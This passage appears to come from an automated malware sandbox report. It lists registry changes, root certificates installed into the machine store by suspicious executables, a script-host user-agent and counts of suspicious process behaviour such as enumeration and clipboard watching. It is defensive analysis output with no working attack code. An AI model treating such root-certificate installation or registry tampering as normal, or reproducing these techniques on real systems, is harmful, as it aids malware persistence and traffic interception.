Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\PROXYSTUBCLSID32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.FileSyncClient.1\ = "FileSyncClient Class"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\ProxyStubClsid32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\mssharepointclient\shell\open\command	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\ProgID\ = "NucleusToastActivator.NucleusToastActivator.1"	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\PROXYSTUBCLSID32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\grvopen\shell	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\0	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\ProxyStubClsid32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\ProgID	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{944903E8-B03F-43A0-8341-872200D2DA9C}\TYPELIB	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\ = "StorageProviderUriSource Class"	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\INPROCSERVER32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\VERSIONINDEPENDENTPROGID	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "{15E16AEC-F2F0-4E52-B0DF-029D11E58E4B}"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{2387C6BD-9A36-41A2-88ED-FF731E529384}\TYPELIB	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.160.0808.0002\\FileSyncShell.dll"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\TypeLib\ = "{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}"	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\ProxyStubClsid32	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\TYPELIB\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\FLAGS	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.AutoPlayHandler\ = "FileSyncClient AutoPlayHandler Class"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\ProxyStubClsid32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\System.IsPinnedToNameSpaceTree = "1"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\NumberOfSubdomain = "1"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 70c392e902a8d701	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\OOBEREQUESTHANDLER.OOBEREQUESTHANDLER.1\CLSID	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.AutoPlayHandler\CurVer\ = "FileSyncClient.AutoPlayHandler.1"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\BannerNotificationHandler.BannerNotificationHandler\shell\import\DropTarget\CLSID = "{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}"	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\ = "FileSyncLibrary 1.0 Type Library"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\NumberOfSubdomain = "0"	MicrosoftEdgeCP.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\TYPELIB\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\FLAGS	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{0D4E4444-CB20-4C2B-B8B2-94E5656ECAE8}\TYPELIB	OneDriveSetup.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun150faeb3537d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun150faeb3537d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	67	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	140	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4356	powershell.exe
4356	powershell.exe
4260	Sun15223697c98.exe
4260	Sun15223697c98.exe
4356	powershell.exe
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
1776	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2880	WerFault.exe
2252	Explorer.EXE
2252	Explorer.EXE
2880	WerFault.exe
2880	WerFault.exe
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2252	Explorer.EXE

Suspicious behavior: MapViewOfSection 18 IoCs

pid	Process
4260	Sun15223697c98.exe
6464	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe
4688	vecgdru
1776	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe
3188	vecgdru
1776	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe
1776	MicrosoftEdgeCP.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
1572	4345284.exe

